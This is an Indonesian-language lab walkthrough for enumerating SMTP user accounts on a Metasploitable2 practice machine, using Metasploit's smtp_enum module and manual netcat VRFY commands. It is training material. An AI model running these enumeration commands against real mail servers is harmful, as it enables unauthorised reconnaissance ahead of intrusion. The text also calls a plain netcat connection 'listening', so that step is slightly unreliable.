Exploit Port 25 (SMTP)

Buka msfconsole di terminal

msfconsole

Cari modul untuk enumerasi user SMTP

search smtp_enum

Dari hasil pencarian hanya ditemukan 1 modul, jadi langsung kita gunakan modul tersebut

use 0

Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini semua parameter sudah terisi secara default kecuali parameter RHOSTS

show options

Isi parameter RHOST dengan IP metasploitable2

set RHOST <IP_metasploitable2>

Sebelum menjalankan exploit buka terminal baru dan jalankan netcat dengan listen port 25

nc <IP_metasploitable2> 25

Jalankan modul tersebut

run

Setelah netcat terhubung, verifikasi masing-masing user apakah dia terdaftar di SMTP server atau tidak. Jika statusnya reject maka user tersebut tidak terdaftar. Ketikkan quit untuk menghentikan netcat

VRFY mysql
VRFY daemon
VRFY postgresql
VRFY postgres
VRFY msfadmin
quit

Modul berhasil dihentikan setelah netcat ditutup